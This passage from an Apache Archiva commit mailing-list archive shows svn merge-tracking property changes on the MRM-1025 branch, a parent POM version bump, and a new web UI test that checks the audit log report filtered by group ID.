archiva/branches/MRM-1025/archiva-modules/plugins/repository-statistics/src/test/ ------------------------------------------------------------------------------ --- svn:mergeinfo (original) +++ svn:mergeinfo Fri Feb 12 15:53:49 2010 @@ -2,4 +2,4 @@ /archiva/branches/MRM-541/archiva-modules/plugins/repository-statistics/src/test:686983-687034 /archiva/branches/archiva-search-improvements/archiva-modules/plugins/repository-statistics/src/test:723609-726925 /archiva/branches/archiva-struts2/archiva-modules/plugins/repository-statistics/src/test:699795-705848 -/archiva/trunk/archiva-modules/plugins/repository-statistics/src/test:825850-887039,887040-909070* +/archiva/trunk/archiva-modules/plugins/repository-statistics/src/test:825850-887039,887040-909464* Propchange: archiva/branches/MRM-1025/archiva-modules/plugins/repository-statistics/src/test/java/ ------------------------------------------------------------------------------ --- svn:mergeinfo (original) +++ svn:mergeinfo Fri Feb 12 15:53:49 2010 @@ -2,4 +2,4 @@ /archiva/branches/MRM-541/archiva-modules/plugins/repository-statistics/src/test/java:686983-687034 /archiva/branches/archiva-search-improvements/archiva-modules/plugins/repository-statistics/src/test/java:723609-726925 /archiva/branches/archiva-struts2/archiva-modules/plugins/repository-statistics/src/test/java:699795-705848 -/archiva/trunk/archiva-modules/plugins/repository-statistics/src/test/java:825850-887039,887040-909070* +/archiva/trunk/archiva-modules/plugins/repository-statistics/src/test/java:825850-887039,887040-909464* Propchange: archiva/branches/MRM-1025/archiva-modules/plugins/repository-statistics/src/test/java/org/ ------------------------------------------------------------------------------ --- svn:mergeinfo (original) +++ svn:mergeinfo Fri Feb 12 15:53:49 2010 @@ -2,4 +2,4 @@ /archiva/branches/MRM-541/archiva-modules/plugins/repository-statistics/src/test/java/org:686983-687034 /archiva/branches/archiva-search-improvements/archiva-modules/plugins/repository-statistics/src/test/java/org:723609-726925 /archiva/branches/archiva-struts2/archiva-modules/plugins/repository-statistics/src/test/java/org:699795-705848 -/archiva/trunk/archiva-modules/plugins/repository-statistics/src/test/java/org:825850-887039,887040-909070* +/archiva/trunk/archiva-modules/plugins/repository-statistics/src/test/java/org:825850-887039,887040-909464* Propchange: archiva/branches/MRM-1025/archiva-modules/plugins/repository-statistics/src/test/java/org/apache/ ------------------------------------------------------------------------------ --- svn:mergeinfo (original) +++ svn:mergeinfo Fri Feb 12 15:53:49 2010 @@ -2,4 +2,4 @@ /archiva/branches/MRM-541/archiva-modules/plugins/repository-statistics/src/test/java/org/apache:686983-687034 /archiva/branches/archiva-search-improvements/archiva-modules/plugins/repository-statistics/src/test/java/org/apache:723609-726925 /archiva/branches/archiva-struts2/archiva-modules/plugins/repository-statistics/src/test/java/org/apache:699795-705848 -/archiva/trunk/archiva-modules/plugins/repository-statistics/src/test/java/org/apache:825850-887039,887040-909070* +/archiva/trunk/archiva-modules/plugins/repository-statistics/src/test/java/org/apache:825850-887039,887040-909464* Propchange: archiva/branches/MRM-1025/archiva-modules/plugins/repository-statistics/src/test/java/org/apache/archiva/ ------------------------------------------------------------------------------ --- svn:mergeinfo (original) +++ svn:mergeinfo Fri Feb 12 15:53:49 2010 @@ -2,4 +2,4 @@ /archiva/branches/MRM-541/archiva-modules/plugins/repository-statistics/src/test/java/org/apache/archiva:686983-687034 /archiva/branches/archiva-search-improvements/archiva-modules/plugins/repository-statistics/src/test/java/org/apache/archiva:723609-726925 /archiva/branches/archiva-struts2/archiva-modules/plugins/repository-statistics/src/test/java/org/apache/archiva:699795-705848 -/archiva/trunk/archiva-modules/plugins/repository-statistics/src/test/java/org/apache/archiva:825850-887039,887040-909070* +/archiva/trunk/archiva-modules/plugins/repository-statistics/src/test/java/org/apache/archiva:825850-887039,887040-909464* Propchange: archiva/branches/MRM-1025/archiva-modules/plugins/repository-statistics/src/test/java/org/apache/archiva/metadata/ ------------------------------------------------------------------------------ --- svn:mergeinfo (original) +++ svn:mergeinfo Fri Feb 12 15:53:49 2010 @@ -2,4 +2,4 @@ /archiva/branches/MRM-541/archiva-modules/plugins/repository-statistics/src/test/java/org/apache/archiva/metadata:686983-687034 /archiva/branches/archiva-search-improvements/archiva-modules/plugins/repository-statistics/src/test/java/org/apache/archiva/metadata:723609-726925 /archiva/branches/archiva-struts2/archiva-modules/plugins/repository-statistics/src/test/java/org/apache/archiva/metadata:699795-705848 -/archiva/trunk/archiva-modules/plugins/repository-statistics/src/test/java/org/apache/archiva/metadata:825850-887039,887040-909070* +/archiva/trunk/archiva-modules/plugins/repository-statistics/src/test/java/org/apache/archiva/metadata:825850-887039,887040-909464* Propchange: archiva/branches/MRM-1025/archiva-modules/plugins/repository-statistics/src/test/java/org/apache/archiva/metadata/repository/ ------------------------------------------------------------------------------ --- svn:mergeinfo (original) +++ svn:mergeinfo Fri Feb 12 15:53:49 2010 @@ -2,4 +2,4 @@ /archiva/branches/MRM-541/archiva-modules/plugins/repository-statistics/src/test/java/org/apache/archiva/metadata/repository:686983-687034 /archiva/branches/archiva-search-improvements/archiva-modules/plugins/repository-statistics/src/test/java/org/apache/archiva/metadata/repository:723609-726925 /archiva/branches/archiva-struts2/archiva-modules/plugins/repository-statistics/src/test/java/org/apache/archiva/metadata/repository:699795-705848 -/archiva/trunk/archiva-modules/plugins/repository-statistics/src/test/java/org/apache/archiva/metadata/repository:825850-887039,887040-909070* +/archiva/trunk/archiva-modules/plugins/repository-statistics/src/test/java/org/apache/archiva/metadata/repository:825850-887039,887040-909464* Propchange: archiva/branches/MRM-1025/archiva-modules/plugins/repository-statistics/src/test/java/org/apache/archiva/metadata/repository/stats/ ------------------------------------------------------------------------------ --- svn:mergeinfo (original) +++ svn:mergeinfo Fri Feb 12 15:53:49 2010 @@ -2,4 +2,4 @@ /archiva/branches/MRM-541/archiva-modules/plugins/repository-statistics/src/test/java/org/apache/archiva/metadata/repository/stats:686983-687034 /archiva/branches/archiva-search-improvements/archiva-modules/plugins/repository-statistics/src/test/java/org/apache/archiva/metadata/repository/stats:723609-726925 /archiva/branches/archiva-struts2/archiva-modules/plugins/repository-statistics/src/test/java/org/apache/archiva/metadata/repository/stats:699795-705848 -/archiva/trunk/archiva-modules/plugins/repository-statistics/src/test/java/org/apache/archiva/metadata/repository/stats:825850-887039,887040-909070* +/archiva/trunk/archiva-modules/plugins/repository-statistics/src/test/java/org/apache/archiva/metadata/repository/stats:825850-887039,887040-909464* Propchange: archiva/branches/MRM-1025/archiva-modules/plugins/repository-statistics/src/test/java/org/apache/archiva/metadata/repository/stats/RepositoryStatisticsManagerTest.java ------------------------------------------------------------------------------ --- svn:mergeinfo (original) +++ svn:mergeinfo Fri Feb 12 15:53:49 2010 @@ -2,4 +2,4 @@ /archiva/branches/MRM-541/archiva-modules/plugins/repository-statistics/src/test/java/org/apache/archiva/metadata/repository/stats/RepositoryStatisticsManagerTest.java:686983-687034 /archiva/branches/archiva-search-improvements/archiva-modules/plugins/repository-statistics/src/test/java/org/apache/archiva/metadata/repository/stats/RepositoryStatisticsManagerTest.java:723609-726925 /archiva/branches/archiva-struts2/archiva-modules/plugins/repository-statistics/src/test/java/org/apache/archiva/metadata/repository/stats/RepositoryStatisticsManagerTest.java:699795-705848 -/archiva/trunk/archiva-modules/plugins/repository-statistics/src/test/java/org/apache/archiva/metadata/repository/stats/RepositoryStatisticsManagerTest.java:825850-909070 +/archiva/trunk/archiva-modules/plugins/repository-statistics/src/test/java/org/apache/archiva/metadata/repository/stats/RepositoryStatisticsManagerTest.java:825850-909464 Modified: archiva/branches/MRM-1025/pom.xml URL: http://svn.apache.org/viewvc/archiva/branches/MRM-1025/pom.xml?rev=909470&r1=909469&r2=909470&view=diff ============================================================================== --- archiva/branches/MRM-1025/pom.xml (original) +++ archiva/branches/MRM-1025/pom.xml Fri Feb 12 15:53:49 2010 @@ -25,7 +25,7 @@ <parent> <groupId>org.apache.archiva</groupId> <artifactId>archiva-parent</artifactId> - <version>5</version> + <version>6-SNAPSHOT</version> <relativePath>../parent/pom.xml</relativePath> </parent> <name>Archiva</name> Propchange: archiva/branches/MRM-1025/skin/src/main/resources/META-INF/maven/site.vm ------------------------------------------------------------------------------ --- svn:mergeinfo (original) +++ svn:mergeinfo Fri Feb 12 15:53:49 2010 @@ -1 +1 @@ -/archiva/trunk/skin/src/main/resources/META-INF/maven/site.vm:899478-909070 +/archiva/trunk/skin/src/main/resources/META-INF/maven/site.vm:899478-909464 Propchange: archiva/branches/MRM-1025/skin/src/main/resources/css/maven-base.css ------------------------------------------------------------------------------ --- svn:mergeinfo (original) +++ svn:mergeinfo Fri Feb 12 15:53:49 2010 @@ -1 +1 @@ -/archiva/trunk/skin/src/main/resources/css/maven-base.css:899478-909070 +/archiva/trunk/skin/src/main/resources/css/maven-base.css:899478-909464 Propchange: archiva/branches/MRM-1025/skin/src/main/resources/css/print.css ------------------------------------------------------------------------------ --- svn:mergeinfo (original) +++ svn:mergeinfo Fri Feb 12 15:53:49 2010 @@ -1 +1 @@ -/archiva/trunk/skin/src/main/resources/css/print.css:899478-909070 +/archiva/trunk/skin/src/main/resources/css/print.css:899478-909464 Propchange: archiva/branches/MRM-1025/skin/src/main/resources/images/logos/ ------------------------------------------------------------------------------ --- svn:mergeinfo (original) +++ svn:mergeinfo Fri Feb 12 15:53:49 2010 @@ -1 +1 @@ -/archiva/trunk/skin/src/main/resources/images/logos:899478-909070 +/archiva/trunk/skin/src/main/resources/images/logos:899478-909464 From [email protected] Fri Feb 12 15:54:26 2010 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 90469 invoked from network); 12 Feb 2010 15:54:26 -0000 Received: from hermes.apache.org (HELO mail.apache.org) (161.129.204.104) by minotaur.apache.org with SMTP; 12 Feb 2010 15:54:26 -0000 Received: (qmail 75887 invoked by uid 500); 12 Feb 2010 15:54:26 -0000 Delivered-To: [email protected] Received: (qmail 75826 invoked by uid 500); 12 Feb 2010 15:54:26 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk List-Help: <mailto:[email protected]> List-Unsubscribe: <mailto:[email protected]> List-Post: <mailto:[email protected]> List-Id: <commits.archiva.apache.org> Reply-To: [email protected] Delivered-To: mailing list [email protected] Received: (qmail 75816 invoked by uid 99); 12 Feb 2010 15:54:26 -0000 Received: from nike.apache.org (HELO nike.apache.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Fri, 12 Feb 2010 15:54:26 +0000 X-ASF-Spam-Status: No, hits=-2000.0 required=10.0 tests=ALL_TRUSTED X-Spam-Check-By: apache.org Received: from [161.129.204.104] (HELO eris.apache.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Fri, 12 Feb 2010 15:54:19 +0000 Received: by eris.apache.org (Postfix, from userid 65534) id C1E9B23889DE; Fri, 12 Feb 2010 15:53:56 +0000 (UTC) Content-Type: text/plain; charset="utf-8" MIME-Version: 1.0 Content-Transfer-Encoding: 7bit Subject: svn commit: r909470 [2/3] - in /archiva/branches/MRM-1025: ./ archiva-modules/archiva-base/archiva-consumers/archiva-consumer-api/src/main/java/org/apache/maven/archiva/consumers/ archiva-modules/archiva-base/archiva-proxy/src/test/java/org/apache/arch... Date: Fri, 12 Feb 2010 15:53:54 -0000 To: [email protected] From: [email protected] X-Mailer: svnmailer-1.0.8 Message-Id: <[email protected]> X-Virus-Checked: Checked by ClamAV on apache.org Propchange: archiva/branches/MRM-1025/archiva-modules/archiva-scheduler/archiva-scheduler-repository/src/test/resources/org/apache/archiva/scheduler/repository/ArchivaRepositoryScanningTaskExecutorTest.xml ------------------------------------------------------------------------------ --- svn:mergeinfo (original) +++ svn:mergeinfo Fri Feb 12 15:53:49 2010 @@ -2,4 +2,4 @@ /archiva/branches/MRM-541/archiva-modules/archiva-scheduler/archiva-scheduler-repository/src/test/resources/org/apache/archiva/scheduler/repository/ArchivaRepositoryScanningTaskExecutorTest.xml:686983-687034 /archiva/branches/archiva-search-improvements/archiva-modules/archiva-scheduler/archiva-scheduler-repository/src/test/resources/org/apache/archiva/scheduler/repository/ArchivaRepositoryScanningTaskExecutorTest.xml:723609-726925 /archiva/branches/archiva-struts2/archiva-modules/archiva-scheduler/archiva-scheduler-repository/src/test/resources/org/apache/archiva/scheduler/repository/ArchivaRepositoryScanningTaskExecutorTest.xml:699795-705848 -/archiva/trunk/archiva-modules/archiva-scheduler/archiva-scheduler-repository/src/test/resources/org/apache/archiva/scheduler/repository/ArchivaRepositoryScanningTaskExecutorTest.xml:825850-909070 +/archiva/trunk/archiva-modules/archiva-scheduler/archiva-scheduler-repository/src/test/resources/org/apache/archiva/scheduler/repository/ArchivaRepositoryScanningTaskExecutorTest.xml:825850-909464 Propchange: archiva/branches/MRM-1025/archiva-modules/archiva-scheduler/archiva-scheduler-repository/src/test/resources/test-repo/ ------------------------------------------------------------------------------ --- svn:mergeinfo (original) +++ svn:mergeinfo Fri Feb 12 15:53:49 2010 @@ -2,4 +2,4 @@ /archiva/branches/MRM-541/archiva-modules/archiva-scheduler/archiva-scheduler-repository/src/test/resources/test-repo:686983-687034 /archiva/branches/archiva-search-improvements/archiva-modules/archiva-scheduler/archiva-scheduler-repository/src/test/resources/test-repo:723609-726925 /archiva/branches/archiva-struts2/archiva-modules/archiva-scheduler/archiva-scheduler-repository/src/test/resources/test-repo:699795-705848 -/archiva/trunk/archiva-modules/archiva-scheduler/archiva-scheduler-repository/src/test/resources/test-repo:825850-909070 +/archiva/trunk/archiva-modules/archiva-scheduler/archiva-scheduler-repository/src/test/resources/test-repo:825850-909464 Propchange: archiva/branches/MRM-1025/archiva-modules/archiva-web/archiva-webapp-test/ ('svn:mergeinfo' removed) Modified: archiva/branches/MRM-1025/archiva-modules/archiva-web/archiva-webapp-test/src/test/resources/testng.properties URL: http://svn.apache.org/viewvc/archiva/branches/MRM-1025/archiva-modules/archiva-web/archiva-webapp-test/src/test/resources/testng.properties?rev=909470&r1=909469&r2=909470&view=diff ============================================================================== --- archiva/branches/MRM-1025/archiva-modules/archiva-web/archiva-webapp-test/src/test/resources/testng.properties (original) +++ archiva/branches/MRM-1025/archiva-modules/archiva-web/archiva-webapp-test/src/test/resources/testng.properties Fri Feb 12 15:53:49 2010 @@ -81,7 +81,7 @@ SNAPSHOT_ARTIFACTID=archiva-test SNAPSHOT_VERSION=1.0-SNAPSHOT SNAPSHOT_PACKAGING=jar -SNAPSHOT_ARTIFACTFILEPATH=test +SNAPSHOT_ARTIFACTFILEPATH=src/test/it-resources/snapshots/org/apache/maven/archiva/web/test/foo-bar/1.0-SNAPSHOT/foo-bar-1.0-SNAPSHOT.jar SNAPSHOT_REPOSITORYID=snapshots # REPOSITORIES @@ -106,3 +106,8 @@ # Browse - MRM-1278 test SNAPSHOTS_REPOSITORY=snapshots RELEASES_REPOSITORY=releases + +# Audit Log Report - MRM-1304 +AUDITLOG_GROUPID=group.id +AUDITLOG_EXPECTED_ARTIFACT=group/id/test/1.0/test-1.0.jar + Modified: archiva/branches/MRM-1025/archiva-modules/archiva-web/archiva-webapp-test/src/test/testng/org/apache/archiva/web/test/AuditLogsReportTest.java URL: http://svn.apache.org/viewvc/archiva/branches/MRM-1025/archiva-modules/archiva-web/archiva-webapp-test/src/test/testng/org/apache/archiva/web/test/AuditLogsReportTest.java?rev=909470&r1=909469&r2=909470&view=diff ============================================================================== --- archiva/branches/MRM-1025/archiva-modules/archiva-web/archiva-webapp-test/src/test/testng/org/apache/archiva/web/test/AuditLogsReportTest.java (original) +++ archiva/branches/MRM-1025/archiva-modules/archiva-web/archiva-webapp-test/src/test/testng/org/apache/archiva/web/test/AuditLogsReportTest.java Fri Feb 12 15:53:49 2010 @@ -161,4 +161,27 @@ clickLinkWithText( "Logout" ); login( getProperty( "ADMIN_USERNAME" ), getProperty( "ADMIN_PASSWORD" ) ); } + + @Test (dependsOnMethods = { "testAddArtifactValidValues" }, groups = "requiresUpload") + public void testViewAuditLogsReportForGroupId() + { + String groupId = getProperty("AUDITLOG_GROUPID"); + String artifactId = getProperty("ARTIFACTID"); + String version = getProperty("VERSION"); + String packaging = getProperty("PACKAGING"); + String repositoryId = getProperty("REPOSITORYID"); + String expectedArtifact = getProperty("AUDITLOG_EXPECTED_ARTIFACT"); + + addArtifact( groupId, artifactId, version, packaging, getProperty( "SNAPSHOT_ARTIFACTFILEPATH" ), repositoryId ); + + goToAuditLogReports(); + + selectValue( "repository", repositoryId ); + setFieldValue( "groupId", groupId ); + submit(); + + assertAuditLogsReportPage(); + assertTextPresent( expectedArtifact ); + assertTextPresent( repositoryId ); + } } Propchange: archiva/branches/MRM-1025/archiva-modules/archiva-web/archiva-webapp/src/main/resources/struts.properties ------------------------------------------------------------------------------ --- svn:mergeinfo (original) +++ svn:mergeinfo Fri Feb 12 15:53:49 2010 @@ -3,4 +3,4 @@ /archiva/branches/archiva-search-improvements/archiva-modules/archiva-web/archiva-webapp/src/main/resources/struts.properties:723609-726925 /archiva/branches/archiva-struts2/archiva-modules/archiva-web/archiva-webapp/src/main/resources/struts.properties:699795-700720 /archiva/tags/archiva-1.3/archiva-modules/archiva-web/archiva-webapp/src/main/resources/struts.properties:898632 -/archiva/trunk/archiva-modules/archiva-web/archiva-webapp/src/main/resources/struts.properties:825850-909070 +/archiva/trunk/archiva-modules/archiva-web/archiva-webapp/src/main/resources/struts.properties:825850-909464 Propchange: archiva/branches/MRM-1025/archiva-modules/archiva-web/archiva-webapp/src/main/resources/struts.xml ------------------------------------------------------------------------------ --- svn:mergeinfo (original) +++ svn:mergeinfo Fri Feb 12 15:53:49 2010 @@ -3,4 +3,4 @@ /archiva/branches/archiva-search-improvements/archiva-modules/archiva-web/archiva-webapp/src/main/resources/struts.xml:723609-726925 /archiva/branches/archiva-struts2/archiva-modules/archiva-web/archiva-webapp/src/main/resources/struts.xml:699795-700720 /archiva/tags/archiva-1.3/archiva-modules/archiva-web/archiva-webapp/src/main/resources/struts.xml:898632 -/archiva/trunk/archiva-modules/archiva-web/archiva-webapp/src/main/resources/struts.xml:825850-909070 +/archiva/trunk/archiva-modules/archiva-web/archiva-webapp/src/main/resources/struts.xml:825850-909464 Propchange: archiva/branches/MRM-1025/archiva-modules/archiva-web/archiva-webapp/src/test/java/org/apache/archiva/ ------------------------------------------------------------------------------ --- svn:mergeinfo (original) +++ svn:mergeinfo Fri Feb 12 15:53:49 2010 @@ -2,4 +2,4 @@ /archiva/branches/MRM-541/archiva-modules/archiva-web/archiva-webapp/src/test/java/org/apache/archiva:686983-687034 /archiva/branches/archiva-search-improvements/archiva-modules/archiva-web/archiva-webapp/src/test/java/org/apache/archiva:723609-726925 /archiva/branches/archiva-struts2/archiva-modules/archiva-web/archiva-webapp/src/test/java/org/apache/archiva:699795-705848 -/archiva/trunk/archiva-modules/archiva-web/archiva-webapp/src/test/java/org/apache/archiva:825850-882383,882384-909070* +/archiva/trunk/archiva-modules/archiva-web/archiva-webapp/src/test/java/org/apache/archiva:825850-882383,882384-909464* Propchange: archiva/branches/MRM-1025/archiva-modules/archiva-web/archiva-webapp/src/test/java/org/apache/archiva/configuration/ ------------------------------------------------------------------------------ --- svn:mergeinfo (original) +++ svn:mergeinfo Fri Feb 12 15:53:49 2010 @@ -2,4 +2,4 @@ /archiva/branches/MRM-541/archiva-modules/archiva-web/archiva-webapp/src/test/java/org/apache/archiva/configuration:686983-687034 /archiva/branches/archiva-search-improvements/archiva-modules/archiva-web/archiva-webapp/src/test/java/org/apache/archiva/configuration:723609-726925 /archiva/branches/archiva-struts2/archiva-modules/archiva-web/archiva-webapp/src/test/java/org/apache/archiva/configuration:699795-705848 -/archiva/trunk/archiva-modules/archiva-web/archiva-webapp/src/test/java/org/apache/archiva/configuration:825850-882383,885006-909070* +/archiva/trunk/archiva-modules/archiva-web/archiva-webapp/src/test/java/org/apache/archiva/configuration:825850-882383,885006-909464* Propchange: archiva/branches/MRM-1025/archiva-modules/archiva-web/archiva-webapp/src/test/java/org/apache/archiva/configuration/TestConfiguration.java ------------------------------------------------------------------------------ --- svn:mergeinfo (original) +++ svn:mergeinfo Fri Feb 12 15:53:49 2010 @@ -2,4 +2,4 @@ /archiva/branches/MRM-541/archiva-modules/archiva-web/archiva-webapp/src/test/java/org/apache/archiva/configuration/TestConfiguration.java:686983-687034 /archiva/branches/archiva-search-improvements/archiva-modules/archiva-web/archiva-webapp/src/test/java/org/apache/archiva/configuration/TestConfiguration.java:723609-726925 /archiva/branches/archiva-struts2/archiva-modules/archiva-web/archiva-webapp/src/test/java/org/apache/archiva/configuration/TestConfiguration.java:699795-705848 -/archiva/trunk/archiva-modules/archiva-web/archiva-webapp/src/test/java/org/apache/archiva/configuration/TestConfiguration.java:825850-882383,885006-909070 +/archiva/trunk/archiva-modules/archiva-web/archiva-webapp/src/test/java/org/apache/archiva/configuration/TestConfiguration.java:825850-882383,885006-909464 Propchange: archiva/branches/MRM-1025/archiva-modules/archiva-web/archiva-webapp/src/test/java/org/apache/archiva/metadata/ ------------------------------------------------------------------------------ --- svn:mergeinfo (original) +++ svn:mergeinfo Fri Feb 12 15:53:49 2010 @@ -2,4 +2,4 @@ /archiva/branches/MRM-541/archiva-modules/archiva-web/archiva-webapp/src/test/java/org/apache/archiva/metadata:686983-687034 /archiva/branches/archiva-search-improvements/archiva-modules/archiva-web/archiva-webapp/src/test/java/org/apache/archiva/metadata:723609-726925 /archiva/branches/archiva-struts2/archiva-modules/archiva-web/archiva-webapp/src/test/java/org/apache/archiva/metadata:699795-705848 -/archiva/trunk/archiva-modules/archiva-web/archiva-webapp/src/test/java/org/apache/archiva/metadata:825850-882383,882384-909070* +/archiva/trunk/archiva-modules/archiva-web/archiva-webapp/src/test/java/org/apache/archiva/metadata:825850-882383,882384-909464* Propchange: archiva/branches/MRM-1025/archiva-modules/archiva-web/archiva-webapp/src/test/java/org/apache/archiva/metadata/repository/ ------------------------------------------------------------------------------ --- svn:mergeinfo (original) +++ svn:mergeinfo Fri Feb 12 15:53:49 2010 @@ -2,4 +2,4 @@ /archiva/branches/MRM-541/archiva-modules/archiva-web/archiva-webapp/src/test/java/org/apache/archiva/metadata/repository:686983-687034 /archiva/branches/archiva-search-improvements/archiva-modules/archiva-web/archiva-webapp/src/test/java/org/apache/archiva/metadata/repository:723609-726925 /archiva/branches/archiva-struts2/archiva-modules/archiva-web/archiva-webapp/src/test/java/org/apache/archiva/metadata/repository:699795-705848 -/archiva/trunk/archiva-modules/archiva-web/archiva-webapp/src/test/java/org/apache/archiva/metadata/repository:825850-882383,882384-909070* +/archiva/trunk/archiva-modules/archiva-web/archiva-webapp/src/test/java/org/apache/archiva/metadata/repository:825850-882383,882384-909464* Propchange: archiva/branches/MRM-1025/archiva-modules/archiva-web/archiva-webapp/src/test/java/org/apache/archiva/metadata/repository/memory/ ------------------------------------------------------------------------------ --- svn:mergeinfo (original) +++ svn:mergeinfo Fri Feb 12 15:53:49 2010 @@ -2,4 +2,4 @@ /archiva/branches/MRM-541/archiva-modules/archiva-web/archiva-webapp/src/test/java/org/apache/archiva/metadata/repository/memory:686983-687034 /archiva/branches/archiva-search-improvements/archiva-modules/archiva-web/archiva-webapp/src/test/java/org/apache/archiva/metadata/repository/memory:723609-726925 /archiva/branches/archiva-struts2/archiva-modules/archiva-web/archiva-webapp/src/test/java/org/apache/archiva/metadata/repository/memory:699795-705848 -/archiva/trunk/archiva-modules/archiva-web/archiva-webapp/src/test/java/org/apache/archiva/metadata/repository/memory:825850-882383,882384-909070* +/archiva/trunk/archiva-modules/archiva-web/archiva-webapp/src/test/java/org/apache/archiva/metadata/repository/memory:825850-882383,882384-909464* Propchange: archiva/branches/MRM-1025/archiva-modules/archiva-web/archiva-webapp/src/test/java/org/apache/archiva/metadata/repository/memory/TestMetadataRepository.java ------------------------------------------------------------------------------ --- svn:mergeinfo (original) +++ svn:mergeinfo Fri Feb 12 15:53:49 2010 @@ -1 +1 @@ -/archiva/trunk/archiva-modules/archiva-web/archiva-webapp/src/test/java/org/apache/archiva/metadata/repository/memory/TestMetadataRepository.java:888397-909070 +/archiva/trunk/archiva-modules/archiva-web/archiva-webapp/src/test/java/org/apache/archiva/metadata/repository/memory/TestMetadataRepository.java:888397-909464 Propchange: archiva/branches/MRM-1025/archiva-modules/archiva-web/archiva-webapp/src/test/java/org/apache/archiva/metadata/repository/memory/TestMetadataResolver.java ------------------------------------------------------------------------------ --- svn:mergeinfo (original) +++ svn:mergeinfo Fri Feb 12 15:53:49 2010 @@ -2,4 +2,4 @@ /archiva/branches/MRM-541/archiva-modules/archiva-web/archiva-webapp/src/test/java/org/apache/archiva/metadata/repository/memory/TestMetadataResolver.java:686983-687034 /archiva/branches/archiva-search-improvements/archiva-modules/archiva-web/archiva-webapp/src/test/java/org/apache/archiva/metadata/repository/memory/TestMetadataResolver.java:723609-726925 /archiva/branches/archiva-struts2/archiva-modules/archiva-web/archiva-webapp/src/test/java/org/apache/archiva/metadata/repository/memory/TestMetadataResolver.java:699795-705848 -/archiva/trunk/archiva-modules/archiva-web/archiva-webapp/src/test/java/org/apache/archiva/metadata/repository/memory/TestMetadataResolver.java:825850-909070 +/archiva/trunk/archiva-modules/archiva-web/archiva-webapp/src/test/java/org/apache/archiva/metadata/repository/memory/TestMetadataResolver.java:825850-909464 Propchange: archiva/branches/MRM-1025/archiva-modules/archiva-web/archiva-webapp/src/test/java/org/apache/maven/archiva/security/UserRepositoriesStub.java ------------------------------------------------------------------------------ --- svn:mergeinfo (original) +++ svn:mergeinfo Fri Feb 12 15:53:49 2010 @@ -2,4 +2,4 @@ /archiva/branches/archiva-search-improvements/archiva-modules/archiva-web/archiva-webapp/src/test/java/org/apache/maven/archiva/web/rss/UserRepositoriesStub.java:723609-726925 /archiva/branches/archiva-struts2/archiva-modules/archiva-web/archiva-webapp/src/test/java/org/apache/maven/archiva/web/rss/UserRepositoriesStub.java:699795-705848 /archiva/tags/archiva-1.3/archiva-modules/archiva-web/archiva-webapp/src/test/java/org/apache/maven/archiva/security/UserRepositoriesStub.java:898632 -/archiva/trunk/archiva-modules/archiva-web/archiva-webapp/src/test/java/org/apache/maven/archiva/security/UserRepositoriesStub.java:825850-909070 +/archiva/trunk/archiva-modules/archiva-web/archiva-webapp/src/test/java/org/apache/maven/archiva/security/UserRepositoriesStub.java:825850-909464 Propchange: archiva/branches/MRM-1025/archiva-modules/archiva-web/archiva-webapp/src/test/java/org/apache/maven/archiva/web/action/reports/ ------------------------------------------------------------------------------ --- svn:mergeinfo (original) +++ svn:mergeinfo Fri Feb 12 15:53:49 2010 @@ -3,4 +3,4 @@ /archiva/branches/archiva-search-improvements/archiva-modules/archiva-web/archiva-webapp/src/test/java/org/apache/maven/archiva/web/action/reports:723609-726925 /archiva/branches/archiva-struts2/archiva-modules/archiva-web/archiva-webapp/src/test/java/org/apache/maven/archiva/web/action/reports:699795-705848 /archiva/tags/archiva-1.3/archiva-modules/archiva-web/archiva-webapp/src/test/java/org/apache/maven/archiva/web/action/reports:898632 -/archiva/trunk/archiva-modules/archiva-web/archiva-webapp/src/test/java/org/apache/maven/archiva/web/action/reports:825850-909070 +/archiva/trunk/archiva-modules/archiva-web/archiva-webapp/src/test/java/org/apache/maven/archiva/web/action/reports:825850-909464 Propchange: archiva/branches/MRM-1025/archiva-modules/archiva-web/archiva-webapp/src/test/java/org/apache/maven/archiva/web/action/reports/GenerateReportActionTest.java ------------------------------------------------------------------------------ --- svn:mergeinfo (original) +++ svn:mergeinfo Fri Feb 12 15:53:49 2010 @@ -3,4 +3,4 @@ /archiva/branches/archiva-search-improvements/archiva-modules/archiva-web/archiva-webapp/src/test/java/org/apache/maven/archiva/web/action/reports/GenerateReportActionTest.java:723609-726925 /archiva/branches/archiva-struts2/archiva-modules/archiva-web/archiva-webapp/src/test/java/org/apache/maven/archiva/web/action/reports/GenerateReportActionTest.java:699795-705848 /archiva/tags/archiva-1.3/archiva-modules/archiva-web/archiva-webapp/src/test/java/org/apache/maven/archiva/web/action/reports/GenerateReportActionTest.java:898632 -/archiva/trunk/archiva-modules/archiva-web/archiva-webapp/src/test/java/org/apache/maven/archiva/web/action/reports/GenerateReportActionTest.java:891136-909070 +/archiva/trunk/archiva-modules/archiva-web/archiva-webapp/src/test/java/org/apache/maven/archiva/web/action/reports/GenerateReportActionTest.java:891136-909464 Propchange: archiva/branches/MRM-1025/archiva-modules/archiva-web/archiva-webapp/src/test/java/org/apache/maven/archiva/web/tags/ ------------------------------------------------------------------------------ --- svn:mergeinfo (original) +++ svn:mergeinfo Fri Feb 12 15:53:49 2010 @@ -2,4 +2,4 @@ /archiva/branches/MRM-541/archiva-modules/archiva-web/archiva-webapp/src/test/java/org/apache/maven/archiva/web/tags:686983-687034 /archiva/branches/archiva-search-improvements/archiva-modules/archiva-web/archiva-webapp/src/test/java/org/apache/maven/archiva/web/tags:723609-726925 /archiva/branches/archiva-struts2/archiva-modules/archiva-web/archiva-webapp/src/test/java/org/apache/maven/archiva/web/tags:699795-705848 -/archiva/trunk/archiva-modules/archiva-web/archiva-webapp/src/test/java/org/apache/maven/archiva/web/tags:825850-885005,885006-909070* +/archiva/trunk/archiva-modules/archiva-web/archiva-webapp/src/test/java/org/apache/maven/archiva/web/tags:825850-885005,885006-909464* Propchange: archiva/branches/MRM-1025/archiva-modules/archiva-web/archiva-webapp/src/test/java/org/apache/maven/archiva/web/tags/DependencyTreeTest.java ------------------------------------------------------------------------------ --- svn:mergeinfo (original) +++ svn:mergeinfo Fri Feb 12 15:53:49 2010 @@ -2,4 +2,4 @@ /archiva/branches/MRM-541/archiva-modules/archiva-web/archiva-webapp/src/test/java/org/apache/maven/archiva/web/tags/DependencyTreeTest.java:686983-687034 /archiva/branches/archiva-search-improvements/archiva-modules/archiva-web/archiva-webapp/src/test/java/org/apache/maven/archiva/web/tags/DependencyTreeTest.java:723609-726925 